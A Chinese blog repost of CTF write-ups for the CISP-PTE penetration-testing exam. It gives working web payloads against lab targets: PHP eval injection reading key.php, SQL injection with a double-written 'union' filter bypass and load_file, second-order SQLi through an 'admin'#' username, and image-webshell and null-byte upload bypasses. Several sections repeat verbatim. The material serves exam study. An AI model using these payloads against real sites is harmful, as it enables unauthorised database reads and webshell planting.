CISP-PTE认证中遇到的CTF题目及WP

admin 2022年2月7日23:00:31评论401 views字数 3779阅读12分35秒阅读模式


今天是虎年开工第一天!

祝您如虎添翼,开工大吉!

七星高照,万事可期!

大年初七开门红,虎虎生威发大财!

CISP-PTE认证中遇到的CTF题目及WP



文章首发于:
火线Zone社区(https://zone.huoxian.cn/)

CISP-PTE中的题目,毕竟网上的资料比较少,因为考这个贵呀,大家毕竟也舍不得分享,基础题目还是比较简单的。

CISP-PTE认证中遇到的CTF题目及WP

命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令(或者bash命令)至服务器程序服务器程序通过system、eval、exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。


通过你所学到的知识,通过执行Linux命令获取webshell,答案就在根目录下key.php文件中。
请开始答题!

CISP-PTE认证中遇到的CTF题目及WP

类似于DVWA的命令执行,因为知道是windows的系统,但还是使用了linux的命令,回显竟然是敏感字符,刚开始以为是有股后端WAF过滤了连接服,测试之后才发现并没有。

补充一下连接符的命令:Windows下

a | b #a为真,b执行,a为假,b执行
a || b #a为真,b不执行;a为假,b执行
a && b #a为真,b执行,a为假,b不执行
a&b #a为真,b执行,a为假,b执行

Linux绕过WAF总结
https://blog.csdn.net/weixin_31106267/article/details/116590213
CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP

http://10.10.114.230/PTE/3.File_Include1/page.php

源码:
<?php        error_reporting(0);        $a=@$_REQUEST['hello'];        eval("var_dump($a);");        show_source(__FILE__);?>

比较简单,分析源码就是get传入参数hello,通过eval去执行dump命令,那么直接构造参数内容,想要执行var_dump($a),hello参数的内容首先就是先闭合var_dump函数,再利用“ ; ”,去拼接一条命令即可,后面拼接的命令就可以使用var_dump打印或者print_r打印,打印的内容就是key.php的内容,payload如下:

?hello=);print_r(file("key.php")
?hello=);var_dump(file("key.php")

CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP

上传测试,仅可以上传png图片,但是重新更改后缀名称,除了php基本上都可以,可以判断出该文件上传起码有三个条件:


  • 上传的文件必须为图片马
  • 检测也是基于内容的检测,图片马中的木马也需要是变形的。
  • 上传图片木马,然后修改后缀即可

CISP-PTE认证中遇到的CTF题目及WP

访问
CISP-PTE认证中遇到的CTF题目及WP

连就对了。

CISP-PTE认证中遇到的CTF题目及WP

随便输入,可以发现并没有过滤什么内容,输入id=1'

select * from article where (id like '%1'%')

看到回显,直接闭合掉,测试注释。
?id=1%27)%20order%20by%204%20--+

测试在order by 5的时候报错,说明有四个字段,其实这种情况下直接猜测就可以,页面首先三个字段,标题、作者和内容。那么就直接使用开始进行手工注入。

?id=-1%27)%20union%20select%201,2,3,4%20--+

根据回显发现过滤掉了union,那么比较简单双写就可以绕过了。

?id=-1%27)%20ununionion%20select%201,database(),3,4%20--+
CISP-PTE认证中遇到的CTF题目及WP

成功爆出数据库名,根据题目提示需要读取文件,那么使用load_file去读文件就ok了,构造payload。

?id=-1%27)%20ununionion%20select%201,load_file(%27/tmp/key%27),3,4%20--+

即可直接读取key。

CISP-PTE认证中遇到的CTF题目及WP

burp抓包即可,应该是onserver类型的。
CISP-PTE认证中遇到的CTF题目及WP

登录即可得到key。
CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP

随便输入,可以发现并没有过滤什么内容,输入id=1'

select * from article where (id like '%1'%')

看到回显,直接闭合掉,测试注释。
?id=1%27)%20order%20by%204%20--+

测试在order by 5的时候报错,说明有四个字段,其实这种情况下直接猜测就可以,页面首先三个字段,标题、作者和内容。那么就直接使用开始进行手工注入。

?id=-1%27)%20union%20select%201,2,3,4%20--+

根据回显发现过滤掉了union,那么比较简单双写就可以绕过了。

?id=-1%27)%20ununionion%20select%201,database(),3,4%20--+

CISP-PTE认证中遇到的CTF题目及WP

成功爆出数据库名,根据题目提示需要读取文件,那么使用load_file去读文件就ok了,构造payload。

?id=-1%27)%20ununionion%20select%201,load_file(%27/tmp/key%27),3,4%20--+
即可直接读取key。

CISP-PTE认证中遇到的CTF题目及WP

http://10.10.114.230/sqli-labs/Less-24/index.php
CISP-PTE认证中遇到的CTF题目及WP

注册一个新的用户,用户名为" admin'# "
CISP-PTE认证中遇到的CTF题目及WP

创建后登录。然后直接修改密码,修改后登录。
CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP

http://192.168.100.180:81/start/index.php

进行闭合尝试,在尝试payload

?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6%27%20and%20%271%27=%271


uid=xxxxx' or '1'='1

http://192.168.100.180:81/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' UNION SELECT 1,2,3,4,5,6 and '1'='1


测试该数据库有6个字段,开始爆库

?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' UNION SELECT 1,2,database(),4,5,6 and '1'='1
CISP-PTE认证中遇到的CTF题目及WP

?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),4,5,6 and '1'='1
CISP-PTE认证中遇到的CTF题目及WP

得到表之后直接查询
?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='IS_KEY'),4,5,6 and '1'='1

CISP-PTE认证中遇到的CTF题目及WP

得到列名,查值
?uuid=-983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,(select group_concat(haha) from IS_KEY),4,5,6 and '1'='1

CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP

http://192.168.100.180:82/start/

上传一句话木马文件不行,上传一句话00截断上传失败,需上传马明命名之后进行00截断即可。


CISP-PTE认证中遇到的CTF题目及WP
CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP

http://10.10.114.230/PTE/3.File_Include1/page.php

源码:
<?php        error_reporting(0);        $a=@$_REQUEST['hello'];        eval("var_dump($a);");        show_source(__FILE__);?>

比较简单,分析源码就是get传入参数hello,通过eval去执行dump命令,那么直接构造参数内容,想要执行var_dump($a),hello参数的内容首先就是先闭合var_dump函数,再利用“ ; ”,去拼接一条命令即可,后面拼接的命令就可以使用var_dump打印或者print_r打印,打印的内容就是key.php的内容,payload如下:


?hello=);print_r(file("key.php")
?hello=);var_dump(file("key.php")

CISP-PTE认证中遇到的CTF题目及WP

内容比较基础,但总的来说东西比较系统,不一定三个小时能够毫无准备的顺利解决基础+综合,另外祝大家开工大吉!



【火线—白帽技术交流群】
进群可以与技术大佬互相交流
进群有机会免费领取节假日礼品
进群可以免费观看技术分享直播
识别二维码回复【交流群】进群
CISP-PTE认证中遇到的CTF题目及WP

CISP-PTE认证中遇到的CTF题目及WP


【火线zone社区周激励】
2022.1.24 ~ 2022.1.30公告
CISP-PTE认证中遇到的CTF题目及WP
【精选文章】

CISP-PTE认证中遇到的CTF题目及WP


CISP-PTE认证中遇到的CTF题目及WP


CISP-PTE认证中遇到的CTF题目及WP

火线Zone是[火线安全平台]运营的封闭式实战安全攻防社区,研究讨论实战攻防技术,平台向顶尖的白帽子提供安全测试的云端基础设施,目前火线的高级白帽子数量已经近万人,欢迎具备分享和探索精神的白帽子加入火线Zone社区,共建一个有技术氛围的优质社区!

如需转载火线Zone公众号内的文章请联系火线小助手:hxanquan(微信)


CISP-PTE认证中遇到的CTF题目及WP
CISP-PTE认证中遇到的CTF题目及WP

扫码关注我们


CISP-PTE认证中遇到的CTF题目及WP

戳这里,加入社区,共建一个有技术氛围的优质社区!


原文始发于微信公众号(火线Zone):CISP-PTE认证中遇到的CTF题目及WP

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月7日23:00:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CISP-PTE认证中遇到的CTF题目及WPhttps://cn-sec.com/archives/767590.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息